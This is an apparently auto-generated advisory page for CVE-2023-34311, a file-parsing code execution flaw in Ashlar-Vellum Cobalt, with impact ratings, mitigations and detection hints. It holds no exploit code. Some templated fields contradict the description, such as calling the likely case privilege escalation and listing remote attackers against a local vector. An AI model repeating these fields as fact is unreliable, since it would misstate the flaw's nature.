CVE-2023-34311 – This vulnerability allows remote attackers to e... (How to Fix)

Q: What is the severity of CVE-2023-34311?

CVE-2023-34311 has a CVSS score of 7.8 (HIGH). This vulnerability allows remote attackers to execute arbitrary code on Ashlar-Vellum Cobalt installations by tricking users into opening malicious CO files. Attackers can gain control of the affected system with the same privileges as the current user. All users of vulnerable Ashlar-Vellum Cobalt versions are affected.

📋 TL;DR

This vulnerability allows remote attackers to execute arbitrary code on Ashlar-Vellum Cobalt installations by tricking users into opening malicious CO files. Attackers can gain control of the affected system with the same privileges as the current user. All users of vulnerable Ashlar-Vellum Cobalt versions are affected.

💻 Affected Systems

Products:

Ashlar-Vellum Cobalt

Versions: All versions prior to the security update

Operating Systems: Windows, macOS

Default Config Vulnerable: ⚠️ Yes

Notes: All default installations are vulnerable. User interaction required (opening malicious file).

📦 What is this software?

Cobalt by Ashlar

View all CVEs affecting Cobalt →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise with attacker gaining full control of the affected machine, potentially leading to data theft, ransomware deployment, or lateral movement within the network.

🟠

Likely Case

Local privilege escalation leading to data exfiltration or installation of persistent malware on the affected workstation.

🟢

If Mitigated

Limited impact due to application sandboxing or restricted user privileges, potentially resulting in application crash only.

🌐 Internet-Facing: MEDIUM

🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: MEDIUM

Exploitation requires user interaction but is straightforward once malicious file is opened. ZDI has confirmed the vulnerability.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Check with Ashlar-Vellum for specific patched version

Vendor Advisory: https://www.ashlar.com/security-advisories/

Restart Required: Yes

Instructions:

1. Contact Ashlar-Vellum support for security update
2. Download and install the latest patched version
3. Restart the application and system

🔧 Temporary Workarounds

Restrict CO file handling

all

Block or restrict opening of CO files from untrusted sources

Application sandboxing

all

Run Cobalt with reduced privileges or in sandboxed environment

🧯 If You Can't Patch

Implement application whitelisting to prevent unauthorized execution
Use network segmentation to isolate affected systems

🔍 How to Verify

Check if Vulnerable:

Check Ashlar-Vellum Cobalt version against vendor's security advisory

Check Version:

Check within Cobalt application: Help → About

Verify Fix Applied:

Verify installation of patched version from vendor

📡 Detection & Monitoring

Log Indicators:

Unexpected application crashes
Suspicious file opening events
Unusual process creation from Cobalt

Network Indicators:

Unexpected outbound connections from Cobalt process

SIEM Query:

Process creation where parent_process contains 'cobalt' AND process_name not in (expected_process_list)

📊 Metadata

CVE ID: CVE-2023-34311

CVSS v3 Score: 7.8 (HIGH)

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE: CWE-822

Published: May 3, 2024

Last Updated: August 8, 2025

🔗 References

https://www.zerodayinitiative.com/advisories/ZDI-23-871/ Third Party Advisory
https://www.zerodayinitiative.com/advisories/ZDI-23-871/ Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-34311, you might also want to check these: